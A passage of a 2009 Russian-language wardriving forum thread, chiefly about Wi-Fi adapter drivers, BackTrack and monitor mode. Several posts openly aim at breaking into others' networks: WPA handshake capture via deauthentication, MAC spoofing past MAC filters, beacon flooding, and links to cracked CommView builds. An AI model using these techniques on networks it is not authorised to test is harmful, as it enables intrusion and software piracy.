Просмотр полной версии : [Wi-Fi, BT] Задай вопрос - получи ответ!
Страницы :
1
2
3
4
5
6
7
[
8]
9
10
11
DWA-140/// вобще ВТ 3 не определяет адаптер , а на WINDE работает,не пойму ?
как запустить DWA-140 в DT-3 ?
так при загрузке БТ3 меню появляется нажимаешь табуляцию на пункте меню и прописываешь
попробовал не получается,начинает заторможенно грузится и виснет все одно
при обыкновенной загрузке виснет после загрузок баз. потом строчек 6-7 и вот на етой строчке (Triggering udev events: /sbin/udevtrigger) виснет, у моего товарища на этом месте тоже ошибка, но происходит игнор и грузится далее.Что это может быть ума не приложу.
да. толь что разобрался с D-Link DWA-140 USB работает в ВТ3, у меня 3 разных ВТ-3 версии, качал с разных сайтов ,в одной из них,вообще не определил устройство ,а в других всё поехало ,и драйвер прописал на мониторинг # ra0 rt2500 (monitor mode enabled )
Скажите пожалуйста. Купили delink 1160, на нем можно взламывать wi-fi сети. если можно то как.
Скажите пожалуйста. Купили delink 1160, на нем можно взламывать wi-fi сети. если можно то как.
А поиском пользоватся не пробовал? на форуме есть все материалы по этому вопросу.
А поиском пользоватся не пробовал? на форуме есть все материалы по этому вопросу.
если он видит сети , в режиме клиент , то можно попробывать в ВТ его запустить ,вот ссылка по настройке клиента http://www.dlink.kz/ru/products/2/753.html пробуй
user_bad
26.03.2009, 23:02
попробовал не получается,начинает заторможенно грузится и виснет все одно
при обыкновенной загрузке виснет после загрузок баз. потом строчек 6-7 и вот на етой строчке (Triggering udev events: /sbin/udevtrigger) виснет, у моего товарища на этом месте тоже ошибка, но происходит игнор и грузится далее.Что это может быть ума не приложу.
да я не особо в линухе шарю нужно по форумам походить может подскажут, к чему это относится у меня строго тормозился на аспи ну еще там варианты разные БТ3 финальных 3 версии одна исо для СД другая исо для флэшки и третья для виртуальной мащины, я пробовал СД и ЮСБ они отличаются но помоему не очень, у юсб меню при загрузке больше пунктов содержит.
а как вт4 установить на флешку? ато чето нефига не получаеться!!!! :confused:
а как вт4 установить на флешку? ато чето нефига не получаеться!!!! :confused:
товарисч юзайте поиск вот ... ето тута было
Не знаю куда эту тему всунуть и будет ли она актуальна сейчас, но всё же хочу написать чтобы помочь другим...
Когда первый раз я столкнулся с ВТ3, то читал, что её нужно устанавливать при помощи каких-то прог...- ерунда, распакуйте архив на флешку, потом в папке BOOT есть батник, клацните его, после чего он попросит сделать флешьку загрузочной, согласитесь... :) (только контролируйте место в которое он хочет забутить...) Перегрузите комп и просмотрите результат...
Если не работает, но зайдите в папку ВТ3 и проклацайте другой батнк (*.bat), после чего вернитесь в папку BOOT и сделайте так как написано выше...
Наслаждайтесь BT3, лучше для вардрайвинга нет...
Желаю удачи...
Если кто-то чего-то не понял, то пишите - помогу...
товарисч юзайте поиск вот ... ето тута было
Не знаю куда эту тему всунуть и будет ли она актуальна сейчас, но всё же хочу написать чтобы помочь другим...
Когда первый раз я столкнулся с ВТ3, то читал, что её нужно устанавливать при помощи каких-то прог...- ерунда, распакуйте архив на флешку, потом в папке BOOT есть батник, клацните его, после чего он попросит сделать флешьку загрузочной, согласитесь... :) (только контролируйте место в которое он хочет забутить...) Перегрузите комп и просмотрите результат...
Если не работает, но зайдите в папку ВТ3 и проклацайте другой батнк (*.bat), после чего вернитесь в папку BOOT и сделайте так как написано выше...
Наслаждайтесь BT3, лучше для вардрайвинга нет...
Желаю удачи...
Если кто-то чего-то не понял, то пишите - помогу...
ты меня не понял!!! я с ВТ3 разбираюсь неплохо. вот только когда запустил ВТ4 то он у меня не находит всех папок и файлов. выдает логин и пароль! логин вожу root а вот пароль не хочет ничего прописывать! клава вобще не хочет работать чеб не нажимал!!!!! :confused:
jawbreaker
29.03.2009, 13:00
а вот пароль не хочет ничего прописывать! клава вобще не хочет работать чеб не нажимал!!!!! :confused:
Мда. Если вы не знаете, то в линуксе так и должно быть. Вводите пароль вслепую, чтобы злобные хакеры не подглядели из-за спины. А чтобы установить BT на флешку лучше использовать Unetbootin (http://citkit.ru/articles/915/).
Кстати, пароль рута в BT toor. Это на всякий случай =)
Karantin
29.03.2009, 13:26
ВТ4 то он у меня не находит всех папок и файлов
Это beta релиз, еще "сырой".
А, знаю багу xD
Вот вам решение...
Когда заходишь в медиа - правой кнопкой мыши, потом свойства, "Ok", и все разделы появляються xD
У меня что на лайве, что на живом инсталле - одно и тоже.
AmD3Dnow
30.03.2009, 01:02
Решил вот такую антенну прикупить для Alfa AWUS036H, так как в поставке идет слабая всего на 2 dBi, как считаете реально ли заявленные 16 dBi ?
2.4GHz 16 dBi WIFI Booster Wireless Antenna WLAN RP-SMA
у мну стоит роутер wi-fi кароч настроин он модем- роутер дальше мой комп стацонр
дальше идут ноуты , и тут такой прикол получаеться роутер настроин нормально wpa2
пароль вручную написал буквы символы кароч фиг запомниш цыпр букв около 15 ..
дк работал он нормально и тут такой прикол вырубаеться он сам по себе ... и че еще просек пишет одинаковые имена в сети вот что выскакивает (ло) ..
возможно ли что какаято п"дло ломиться комне меняя мак адрес итп . ?????
а у меня такой вопрос. ВТ4 вобще как нибудь мона подключиться к сети? и как это сделать?
а у меня такой вопрос. ВТ4 вобще как нибудь мона подключиться к сети? и как это сделать?
Можно. Мож что поконкретней расскажешь а то тут не телепаты
ты дрова ставил ?
ты дрова ставил ?
ну вобще в терминале пишит wifi0 ath0!
а сетей не видит. но это все я делаю до запуска airmon-ng!
а сетей не видит
Может их просто нету в радиусе xD
Может их просто нету в радиусе xD
ДА. AIRODUMP видит их! а больше ничего не видит!!!
ДА. AIRODUMP видит их! а больше ничего не видит!!!
Клиентов всмысле нету?
DHCP и Network Manager по умолчанию вырублены, дабы не мешали аиродампу и тд. Чтобы стартовать, наберите в консоли:
/etc/init.d/networking start
/etc/init.d/NetworkManager start
После юзаем NetworkManager для подключения к точке (глобус в трее).
Для остановки, вместо start, пишем stop.
Ситуация такая:раньше была плата на компе NETGEAR, я ламал сетку связкой CommView for WiFi + aircrack. Но карта полетела и купил се бук(Давно мечтал). Так вот теперь моя карта никакими сниферами неподдерживается. И драйверов переводящую мою карту в режим мониторинга нема. Кто поможет найти подходящее ПО? Вот сама карта Intel(R) PRO/Wireless 3945ABG Network Connection
хм странно у мну такая же плата и комвивер конает
на хр только правда под вистой не хочет , там можт
дровка нужны ? я правда тож не работало но я качал дровка ставил все подрят и заработало , у тя хр ? если виста , лично я не смог заставить заработать под вистой ету карту .
KaZ@NoVa
03.04.2009, 21:03
эм у меня такая же беда)
только у меня RealTek RTL8187B
и тоже нифига найти не могу
хм странно у мну такая же плата и комвивер конает
на хр только правда под вистой не хочет , там можт
дровка нужны ? я правда тож не работало но я качал дровка ставил все подрят и заработало , у тя хр ? если виста , лично я не смог заставить заработать под вистой ету карту .
Скажи плиз что делал!Потомучто я все драва испробавал и нифига
Драва вроде как ставились. Но он писал чтоб я включил переключатель на буке, а он и так был включен
У меня точно такая же карта на ноуте - все прекрасно. Что коммвью, что под бт бегает.
У меня точно такая же карта на ноуте - все прекрасно. Что коммвью, что под бт бегает.
В списке поддерживаемых плат её нет Gigabyte GN-WP01GT (mini) PCI WLAN Card
Intel PRO/Wireless 2200BG Mini PCI Adapter *
Intel PRO/Wireless 2915ABG Mini PCI Adapter *
Ребята не кто не работал с картой от bratcoma 802.11 a/b/g?
Мля заемался с ним, не фига не слушает, а именно на счет прог типа айркряк и т.п., может кто подскажет.....как зделать чтобы он повелся под эти проги...
Скажи плиз что делал!Потомучто я все драва испробавал и нифига
качни другую версию комвивера из последних крякнутых их визде полно
тут (http://depositfiles.com/files/8vzl8xu09)
CommViewforвифу пробуйте , там еще кино есть про BT весит все 30 метров.
я вот порылся в моем бардаке и еще нарыл такое
CommView.For.WiFi.6.0.585.VoIP
CommView for WiFi 6.1.zip
CommView.for.WiFi.v5.2.484
peek. за содержимым дергать рычаг (http://depositfiles.com/files/gipi5fu9r)
Спасиб, ща заценю))
А он поможет при использовании Bradcomoвской карты?
А он поможет при использовании Bradcomoвской карты?
если чипсет от атероса то поможет )
А как узнать какой чипсет, если нет помогите как можно установить другой чипсет..
А как узнать какой чипсет, если нет помогите как можно установить другой чипсет..
розковырять пасмареть -) ...
удалить родной драйвер , поставить комвив , если в комвиве в перечне есть совместимость твоего адаптера то тебе очень повезло -) , а если нет ,
то мой тебе совет купить если ноут то лично у мну стоит SMC BGN -атерос чип ,карта или наподобе тех каторые а списке а еще лучше купить карту с атеровским чипсетом он поддерживаеться практичиски визде -)
и хорошо работает ...
броадком -- есть на атеросе , но не факт что он у тя стоит , если чип не атерос не парся купи псмсию стоимость около 50 баксов + - 10 баксов можна нормальную взять моя 50тиник обошлась работает отлично и я ей доволен что самое главное Nку бери
я вот порылся в моем бардаке и еще нарыл такое
CommView.For.WiFi.6.0.585.VoIP
CommView for WiFi 6.1.zip
CommView.for.WiFi.v5.2.484
peek. за содержимым дергать рычаг (http://depositfiles.com/files/gipi5fu9r)
а хде кряк та?) У мя он пишит "Хотите купить прогу?"
а хде кряк та?) У мя он пишит "Хотите купить прогу?"
товарисч читайте нормально фак у всех работает у мну лично тож и не нада ;ть мозгы....
юзаем поиск гугл итп.
а то мля выложыш как но ладони , а в ответ где кряк
я в аут ........ запарило .... на форуме 150 статей по етому делу просто нада поднапряч свою попу чуток ...
пардон но я офф
Вроде как запахала прога, но опять же драва. Ты ставил какие от 2200BG или 2915ABG? Ставил все. После установки перестает гореть переключатель на буке и CommView требует включить переключатель
Вроде как запахала прога, но опять же драва. Ты ставил какие от 2200BG или 2915ABG? Ставил все. После установки перестает гореть переключатель на буке и CommView требует включить переключатель
если плата совместима с прогой то тебе не нужно никой драйвер устаавливать оно автоматом будет работать ......... пробуй .. адатер выбири ,
ты хоть понял совместимо оборудование с прогой ???
уххх.... ! ща у мну видео гдет было ...
если плата совместима с прогой то тебе не нужно никой драйвер устаавливать оно автоматом будет работать ......... пробуй .. адатер выбири ,
ты хоть понял совместимо оборудование с прогой ???
уххх.... ! ща у мну видео гдет было ...
Я уже писал, что в списке поддерживаемых плат моей нету! Вопрос был в том, что пойдет на мою плату!
Я уже писал, что в списке поддерживаемых плат моей нету! Вопрос был в том, что пойдет на мою плату!
да видел я все что ты писал , слушать умеешь ?
если ты комвивер заинсталил и оно не работает (если нормально все зделал) и не работает на базар или в магазин за картой
да видел я все что ты писал , слушать умеешь ?
если ты комвивер заинсталил и оно не работает (если нормально все зделал) и не работает на базар или в магазин за картой
Блин))Ты мне скажи смогу ли я ломать с этой карты или нет) Вариант с другой картой это накройняк
Нашел в темке выше
10) Intel® PRO/Wireless 3945ABG (HP)
Разъем подключения: miniPCI express
Драйвер - Linux: Kernel
Программы: Kismet, Airodump, Netstumbler, OmniPeek (Aireplay -> Wifiway, Wifislax)
Регистрация в ОС: ethX
Режим инъекции: Yes (Wifiway, Wifislax)
Режим мониторинга: Yes (OmniPeek)
Режим Promiscious: Yes (Backtrack, Wifiway, Wifislax)
Антенна: Yes. (2x U.FL)
DHCP и Network Manager по умолчанию вырублены, дабы не мешали аиродампу и тд. Чтобы стартовать, наберите в консоли:
После юзаем NetworkManager для подключения к точке (глобус в трее).
Для остановки, вместо start, пишем stop.
спасибо. испробуем! авось получиться!
а кто может мне объяснить как все-таки ломать wpa с помощью airolin-ng? чет я запускаю airolib-ng pskdb init но у меня ничего не происходит! никто не раскажет что почем?
Как понимать "ничего не происходит"? xD
Если просто строка перенеслась, значит база создана. Тебе бы не помешало сначала веп поснимать, и *nix немного поюзать :)
наловил пакетов Airscanner Mobile Sniffer на КПК записал в сап файл пытаюсь его скормить aircrack.exe
не принемает чтот типа не ви-фи файл говорит. или типо того.
как скормить или чему. НА вин ХП или КПК
наловил пакетов Airscanner Mobile Sniffer на КПК записал в сап файл пытаюсь его скормить aircrack.exe
не принемает чтот типа не ви-фи файл говорит. или типо того.
как скормить или чему. НА вин ХП или КПК
пакетов ты скок на собирал 150 000 есть ?
качни нормальный кряк я када качал из 10 скачаных ток 1 рабочий был , ты в формат дамп перекинул ?
Как понимать "ничего не происходит"? xD
Если просто строка перенеслась, значит база создана. Тебе бы не помешало сначала веп поснимать, и *nix немного поюзать :)
с wep я научился давно! а вот с wpa еще не сталкивался, а его все больше и больше становиться! а если нет клиентов на wpa можно както получить другим способом шейк?????
Либо сидеть в засаде, и ждать пока кто-нибудь подконнектиться (натравить аиродамп и уйти), либо только отсоединением клиентов. Пока других способов не придумали... К сожалению.
_SEREGA_
07.04.2009, 21:46
с wep я научился давно! а вот с wpa еще не сталкивался, а его все больше и больше становиться! а если нет клиентов на wpa можно както получить другим способом шейк?????
Я видио тут на ачате по взлому впа смотрел, там направляли отрубающие пакеты на ТОЧКУ и она какимто макаром высылала хандщейк !!!
и ввобще шас впа ломать перебором маловероятно!
жду не дождусь когда ТКИП взломают!
Надо было внимательнее смотреть =\
Она посылала пакет деавторизации, поэтому клиент отключался и при реконнекте отдавал handshake.
_SEREGA_
07.04.2009, 22:08
Я говорил что не на клиента идёт отрубающи пакет а на точку!!! разницу улавливаешь?!! вот видио сливай и смотри ~5MB http://rapidshare.com/files/218589700/WPA_NO_CLIENTS.flv.html
Хмм... Даже интересно стало. Если что - дополню ман... Хотя в люблом случае прийдеться дополнять - опишу как обновлять aircrack-ng апдейтером, и запихну туда этот метод...
_SEREGA_
09.04.2009, 18:53
Хмм... Даже интересно стало. Если что - дополню ман... Хотя в люблом случае прийдеться дополнять - опишу как обновлять aircrack-ng апдейтером, и запихну туда этот метод...
Не совсем понял про что ты, но этот метод лично у меня не пашет =( причеём на всех в округе точках в впа.
chukachinchina
11.04.2009, 03:00
Соответственно интересует, как можно вытащить handshake из имееющегося дампа от airodump-ng.
Его вытаскивать не нужно - если он там есть, то он там есть. Если ты уверен, что в пакете есть хендшейк, то можешь его использовать.
Кто-нибудь знает - какой GPS совместим с НетСтамблером, или чем-то еще подобным. Ибо сказано, что если к системе подключен GPS, то он может определять их местонахождение, что есть очень неплохо.
Для нетстамблера лучше всего gps'ники этих фирм: DeLorme, Garmin, NMEA. Точно известно, что поддерживаются многие модели Garmin и есть огромная поддержка NMEA, так как у него открытый протокол передачи данных.
2 Stradi,
Конкретно по моделям:
Magellan (now Thames) GPS 315
Garmin eTrex Venture
...
Вобщем на форуме нетстамблера написано, что все не юсб адаптеры с протоколом NMEA точно поддерживаются
_SEREGA_
11.04.2009, 17:30
У меня мобила Nokia N82 там есть GPS, возможно ли подключить к компу GPS и сканить Netstumblerom? проблема в том что дров к компу на gps в телефоне то нету!
Нельзя.
Это телефон, а не GPS навигатор, даже если учитывать, что в нем есть GPS.
Тоже самое, если использовать телефон в качестве блютуз, вайфай, ик и тд приемника.
|||
Баловался в фотошопе :)
http://www.weblancer.net/files/portfolio/2073/207313/566918.gif
4ikotillo
12.04.2009, 04:46
У меня мобила Nokia N82 там есть GPS, возможно ли подключить к компу GPS и сканить Netstumblerom? проблема в том что дров к компу на gps в телефоне то нету!
Ntve уже поднимал, только с N95 - нельзя.
_SEREGA_
12.04.2009, 05:50
Ntve уже поднимал, только с N95 - нельзя.
Я по гуглил и нашол что прога есть такая Symarctic ExtGPS она и для моей мобилы пойдет написанно!
какой стандарт чаще всего попадается при wd ? думаю брать карту со стандартом n , ну при этом соответств держит и b, g. НУ про чипсет тож не забуду. Есть смысл ? или брать че нить проще ?
З.Ы. pci
_SEREGA_
12.04.2009, 19:18
какой стандарт чаще всего попадается при wd ? думаю брать карту со стандартом n , ну при этом соответств держит и b, g. НУ про чипсет тож не забуду. Есть смысл ? или брать че нить проще ?
З.Ы. pci
бери чтоб было b/g больше не надо! чипсет хороший atheros,!
Кроме atheros разумеется не стоит забывать о традиционном prism*
_SEREGA_
13.04.2009, 18:56
Вот (на английском) список хороших карт для wardriving PCI/MiniPCI/MiniPCI Express , PCMCIA/Cardbus/Express Card
их описание, и подробности! ксатати Prism он не пашет под windows, а токо под linux! a Atheros и в Windows и в Linux good!
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_bes t_card_to_bud_to_buyy
вот девайсы на Atherose ТУТ (http://atheros.rapla.net/)
"ксатати Prism он не пашет под windows, а токо под linux!" всмысле? как это призм не работает пож вин?! Это чипсет с открытой спецификацией, он работает везде одинакого хорошо под любой ОС и платформой, _SEREGA_ ты наверное где-то ошибся или перепутал.
Разве от чипсета зависит, где адаптер будет, или не будет работать? о_О
У меня вообще адаптер интеловый, и ничего. Так что советы на счет атероса и тд - немного устарели, т.к. кроме них есть уже варианты с такой же функциональностью.
Разве от чипсета зависит, где адаптер будет, или не будет работать? о_О
От чипсета зависит в первую очередь. Ещё зависит от интерфейса, например, usb адаптеры с чипсетом Atheros для вардрайвинга вообще не пригодны.
Так что советы на счет атероса и тд - немного устарели, т.к. кроме них есть уже варианты с такой же функциональностью.
Функциональность разная практически везде, вплоть до отображения мощности адаптера - где-то реализовано, где-то нет.
Stradi конечно зависит тк драйвера к операционной системе пишутся на основе сведений доступных о чипсете, и чем подробнее сведения тем более качественные драйверы и больше возможносте при использовании карты.
Чисет prism* имеет общедоступное описание и довольно-таки хорошее по качеству и поэтому его функционал доступен в любой системе и на любой платформе, но некоторые другие чипсеты таким же хорошим сопровождением не обладают и поэтому их функционал более узок, а иногда и вовсе открытые драйверы не доступны.
От чипсета зависит в первую очередь. Ещё зависит от интерфейса, например, usb адаптеры с чипсетом Atheros для вардрайвинга вообще не пригодны.
Функциональность разная практически везде, вплоть до отображения мощности адаптера - где-то реализовано, где-то нет.
Я имел ввиду ОС. Просто удивился посту в духе "под виндой не будет работать".
На счет функциональности - я говорил варианты, а не имел ввиду все адаптеры. Ну, например мощность сигнала можно поправить внешней антенной и тд. Если говорить о общих целях вардравинга (инъекции, монитор), то есть достаточно широкий выбор.
Alexus, скажем так - если забыть про винду, то выбор достаточно большой.
_SEREGA_
13.04.2009, 21:30
"ксатати Prism он не пашет под windows, а токо под linux!" всмысле? как это призм не работает пож вин?! Это чипсет с открытой спецификацией, он работает везде одинакого хорошо под любой ОС и платформой, _SEREGA_ ты наверное где-то ошибся или перепутал.
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_bes t_card_to_bud_to_buyy
вот там написанно в таблице написано prism 2 no supported.Если я не прав и забдуждаю , я не виноват,так там написаано! по крайней это под airodump,не вкурсе как под другой софт
вот скрин http://s47.radikal.ru/i115/0904/d9/6e178ea83aa2.jpg
airodump-ng не есдинственный вардрайв софт, но я тоже был не прав функциональность prism под windows ограничена и я об этом не знал, извиняюсь
Можно настроить точку, чтобы она работала как приемник? Длинк 2100...
Ибо я пропарился - ничего хорошего не получилось.
Доброго времени суток уважаемые форумчане, у меня такой вопрос, имеется точка доступа WPA - я не интересуюсь как подобрать ключ к WPA, но у этой точки есть функция как bluetooth модем и мой комп ее видит...
Так вот вопрос что можно сделать что бы юзать инет через блютучь и чем, какими утилитами его ломать???
может тема уже подымалась но я не нашел, если кто знает поделитесь знаниями пожалуйста или кинти ссылки на информацию.
Заранее благодарю.
4ikotillo
15.04.2009, 01:22
Доброго времени суток уважаемые форумчане, у меня такой вопрос, имеется точка доступа WPA - я не интересуюсь как подобрать ключ к WPA, но у этой точки есть функция как bluetooth модем и мой комп ее видит...
Так вот вопрос что можно сделать что бы юзать инет через блютучь и чем, какими утилитами его ломать???
может тема уже подымалась но я не нашел, если кто знает поделитесь знаниями пожалуйста или кинти ссылки на информацию.
Заранее благодарю.
Я ни разу не пробовал, но посмотри здесь:
http://video.google.com/videosearch?q=bluetooth+backtrack&emb=0#
4ikotillo
15.04.2009, 02:08
Про USB интерфейс не соглашусь, на личном опыте проверил, работает, только искать такой адаптер очень долго будешь.
_SEREGA_
15.04.2009, 08:22
Про USB интерфейс не соглашусь, на личном опыте проверил, работает, только искать такой адаптер очень долго будешь.
под линуксом с usb будет работать, а под windows нет,по крайней мере airodump. смотри ссылку выше
_SEREGA_ в той доке не описано что будет если воспользоваться cygwin или другим linux эмулятором под windows. Возможно тогда всё и заработает.
4ikotillo
15.04.2009, 18:22
_SEREGA_ в той доке не описано что будет если воспользоваться cygwin или другим linux эмулятором под windows. Возможно тогда всё и заработает.
Vmware нормально под виндой все поддерживает!!!)))
незнаю, как в вмваре, но в qemu под линем(как под виндой не знаю) можно подключать физические устройства. Cygwin вообще напрямую работает с устройствами+ есть другие среды лин в вин. Так что при желании умении терпеть геморой можно сделать всё и везде.
_SEREGA_
15.04.2009, 19:35
Может проги эмулирует, но дрова врятли! если эмулировались дрова то половина чипов других,которые не поддерживаются windows например (broadcom,intel и др.) то они бы работали под windows!
_SEREGA_, я очень сильно не люблю винду , но недавно столкнулся с проблемой, файлы на Ipod touch через *nix не закинешь. Вот что я сделал:
Установил на qemu win xp home, и прикрутил к qemu физические usb порты , установил на эмулируемую винду itunes и сейчас с лёгкостью перекидываю файлы на ipod из под fedoa 10 gnu/linux
Уверен, что под виндой можно провернуть подобное, хотябы с помощью того же qemu.
P.S. 100й пост!
_SEREGA_
15.04.2009, 20:14
_SEREGA_, я очень сильно не люблю винду , но недавно столкнулся с проблемой, файлы на Ipod touch через *nix не закинешь. Вот что я сделал:
Установил на qemu win xp home, и прикрутил к qemu физические usb порты , установил на эмулируемую винду itunes и сейчас с лёгкостью перекидываю файлы на ipod из под fedoa 10 gnu/linux
Уверен, что под виндой можно провернуть подобное, хотябы с помощью того же qemu.
P.S. 100й пост!
Я тоже не люблю винду.
Я так понимаю что ты поставил на свой линь эмулятор мастдая и работал как на полноценном мастдае, ну и что? то что ты можешь подключать порты
через эмулятор, это не означает что дрова будут эмулироваться!
Я лишь имею ввиду, что возможно используя cygwin можно установить на него *nix версию airodump-ng и использовать её на все 100%.
_SEREGA_ мы слишком засоряем раздел помоемому , думаю лучше прекратить обсуждение или переехать в личку.
_SEREGA_
16.04.2009, 16:22
Я лишь имею ввиду, что возможно используя cygwin можно установить на него *nix версию airodump-ng и использовать её на все 100%.
_SEREGA_ мы слишком засоряем раздел помоемому , думаю лучше прекратить обсуждение или переехать в личку.
Речь шла о несовместимости prism! а ты начал говорить про запуск *nix программ на win и наооборот. и смысла запускать *nix-овый airodump
я не вижу! потомучто airodump - это драйвер!
я не думаю что эмулируются драйвера. всё.
http://s55.radikal.ru/i149/0904/82/dd3100cf4d05.jpg
Можно настроить точку, чтобы она работала как приемник? Длинк 2100...
...
_SEREGA_
19.04.2009, 10:02
Ты имеешь ввиду как обычная wifi-ситевуха?
Угу, ибо мне удобнее поставить точку, взять кабель, которого у меня куча, и использовать точку, сидя например в комнате. Это для второго компутера, на котором антенны нету...
_SEREGA_
19.04.2009, 19:45
Угу, ибо мне удобнее поставить точку, взять кабель, которого у меня куча, и использовать точку, сидя например в комнате. Это для второго компутера, на котором антенны нету...
Я точно не знаю,но думаю что это невозможно. Так как не позволит программное обеспечение ТД(прошивка) а так апаратная часть пригодна для такой цели.
Это возможно, когда я на будёнвском искал pcmcia / usb адаптер с портом для внешней антены, мне в качестве альтернативы предлагали подключение через точку доступа. Думаю есть какие-то особые средства, но ещё можно сделать так:
Если для точки есть linux прошивка поставить её, подключить отформатированную в ext2(3) флешку , создать на ней /us/bin и тд, добавить их в PATHS точки доступа, установить на ТД нужные инструменнты , а дальше управлять ими через ssh / ssl
socrates
20.04.2009, 00:51
Доброго времени суток всем , у меня такой вопрос . Была открытая точка доступа , позволяла свободно подключаться и серфить по инету , а потом подключение так и осталось открытым , но в инете серфить уже не позволяет , а скайп и аська работаю ( qip в отличии от аськи не работает ) торент тоже на отдачу работает (скачивать не пробывал ), можно ли в таком случае найти какое либо решиние , что бы инет стал доступен и для браузеров ?
И другой вопрос по aircrack-ng , как можно сделать что бы сбор пакетов для взлома провести в несколько подходов , если за один раз нет возможности наловить достаточно пакетов ?
нужна помощ !
У меня в доме находит wifi без пароля но с ограничением по мак адресу....
как узнать мак адрес компа с которово стоит wifi ? может есть прога какаято....
если можно напишіте в приват с меня +
Elvis000
21.04.2009, 12:14
как узнать мак адрес
airodump-ng
user_bad
22.04.2009, 09:11
даже можно не верить, аиркрек покажет, да и аиродумп в верху пишет об этом факте
De.MakaRz
23.04.2009, 09:41
При подключении и юрзанья нета к удаленной, но открытой точки достипа хайф, с помошью ноута, вычеслить историю простра или что то еще?
Доброе время суток!
Имеется карта TP-Link TL-WN610G. Попытался припаять пингтэйл. Проблема в том, что внешняя антенна никак не влияет на прием сигнала, те накручиваю антенну один уровень, снимаю ее тоже. Что сделал: Отрезал внутренние антенны скальпелем, на одной из антенн оголил часть и припаял центральную жилу, а оплетку припоял рядом на площадку. В чем может быть проблема. Могу выложить фотки, как это выглядит.
какой принцип работы fakeap? говорят, она может создать несколько тысяч левых AP, хотя когда я пробовал создать вручную VAPы, у меня больше 4 одновременно не получалось.
_SEREGA_
25.04.2009, 11:36
fakeap эмулирует тысячи поддельных точек доступа, скрывая таким образом пакеты одной единственной реальной работающей AP. Работает под под linux (тестировалось под Red Hat 7.3), возможна работа под BSD системами, распространяется по GPL. Для работы требует Perl. Умеет работать на чипсетах Prism2/2.5/3 под управлением драйверов Host AP. Органично вписывается в качестве элемента систем обнаружения атак/активной защиты.
я имел в виду какие команды она выполняет, чтобы добиться такого результата? это же обычный скрипт, который настраивает должным образом адаптер при помощи стандартных утилит
В общем - флудит бЭкон пакетами, такими же, только с разными данными (мак, имя и пр, см. скрин), которые точки отправляют в эфир для того, чтобы точку смогли увидеть.
"Black Alchemy's Fake AP generates thousands of counterfeit 802.11b access points. Hide in plain sight amongst Fake AP's cacophony of beacon frames. As part of a honeypot or as an instrument of your site security plan, Fake AP confuses Wardrivers, NetStumblers, Script Kiddies, and other undesirables."
Для защиты от вайрдрайверов - не выжу смысла, ибо тот же airodump сможет отмониторить, куда ходит клиент, и увидит нужный мак. А использовать Стамблер, кроме как для опеределения сигнала - не вижу смысла :)
http://www.wirelessdefence.org/Contents/Images/fakeap4.PNG
да все эти копипасты я уже читал, просто интересно, как реализовано это?
update:
я написал скрипт, который вырубает вап, меняет ессид и номер канала, и снова врубает, и так в цикле, но при сканировании я вижу только одну точку одновременно. Это изза того что у них одинаковый bssid? и как его сменить у VAP? у меня backtrack 4.
ifconfig athX hw ether новый_мак не катит.
не могу выставить номер канала больше 11:
root@laptop:~# iwconfig wlan0 channel 14
Error for wireless request "Set Frequency" (8B04) :
SET failed on device wlan0 ; Invalid argument.
ось Ubuntu
вот вывод lsusb:
Bus 004 Device 003: ID 13b1:0020 Linksys WUSB54GC 802.11g Adapter [ralink rt73]
bons, минуту, сейчас мануал дам, там пару изменений внести надо.
ntldr, проблема просто в том чтобы сменить мак?
Честно, я не все понял, ибо не вникал на столько в построение пакетов... Но мне стало интересно.
_http://forums.remote-exploit.org/showthread.php?t=20426
ADD 12, 13, 14 CH
да все эти копипасты я уже читал, просто интересно, как реализовано это?
update:
я написал скрипт, который вырубает вап, меняет ессид и номер канала, и снова врубает, и так в цикле, но при сканировании я вижу только одну точку одновременно. Это изза того что у них одинаковый bssid? и как его сменить у VAP? у меня backtrack 4.
ifconfig athX hw ether новый_мак не катит.
Посмотри как в проге mdk3 реализовано. Функция create_beacon_frame. На сях.
homepages.tu-darmstadt.de/~p_larbig/wlan/mdk3-v5.tar.bz2
Driver23
26.04.2009, 13:50
Подскажите плиз USB вифи-адаптер с разьемом для внешней антенны. Если есть онные с поддержкой пакетной иньекции, то было бы вообще супер
Подскажите плиз USB вифи-адаптер с разьемом для внешней антенны. Если есть онные с поддержкой пакетной иньекции, то было бы вообще супер
Третья тема сверху "Список Wi-Fi адаптеров пригодных для Wardriving'а" =\ учимся читать
bons, минуту, сейчас мануал дам
_http://forums.remote-exploit.org/showthread.php?t=20426
ADD 12, 13, 14 CH
мануал не помог
пакет wireless-crda установлен уже но толку нет
root@laptop:~# COUNTRY=CH crda
Failed to set regulatory domain: -95
это тоже не помогает:
root@laptop:~# iw reg set CH
command failed: Operation not supported (-95)
и не понял где писать ADD 12, 13, 14 CH, если можно, поточнее пожалуйста
Ну епт. Мне переводить еще?
Сначала ставишь
apt-get install python-m2crypto libgcrypt11 libgcrypt11-dev
Потом качаешь crda и последнюю wireless-regdb библиотеку.
И то, и другое можно найти тут:
http://wireless.kernel.org/en/developers/Regulatory/CRDA
После того, как скачал, пихай оба файла в root (или в свою home папку, но на бт по умолчанию - root).
tar xvzj wireless-regdb-*[дата релиза, просто подставь имя файла].tar.bz2
После копируем regulatory.bin в /usr/lib/crda/
mkdir /usr/lib/crda
cp regulatory.bin /usr/lib/crda/
Меняем директорию на /usr/lib/crda/ и пишем
make && make install
Копируем regulatory.rules, который можно найти в */crda/udev/ в /etc/udev/rules.d/85-regulatory.rules
cd udev
cp regulatory.rules /etc/udev/rules.d/85-regulatory.rules
Теперь можно выставить код страны. Пишем
iw reg set *
Где * - код страны в ISO Alpha2. RU, UA etc.
Чтобы посмотреть все открытые каналы, пишем
iw list
Все...
ntldr, проблема просто в том чтобы сменить мак?
да, чтобы без всяких левых прог типа macchanger, а стандартными утилитами
mkdir /usr/lib/crdaтак как пакет wireless-crda установлен то папка уже была создана и файл regulatory.bin в ней был. Тем не менее для уверенности я его туда переписал опять
Меняем директорию на /usr/lib/crda/ и пишемmake && make install
в этой директории нет Makefile'a. Поэтому эти команды не имеют смысла
откомпилил и установил содержимое архива wireless-regdb-2009.04.17.tar.bz2
файл regulatory.rules нашел в архиве crda-1.0.2.tar.bz2
c учетом всего этого выполнил описанный алгоритм но выставить код страны так и не получилось
2 ntldr
Пример:
ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX
Перед сменой скорее всего надо будет отправить устройство в даун ifconfig eth0 down и потом воскресить ifconfig eth0 up
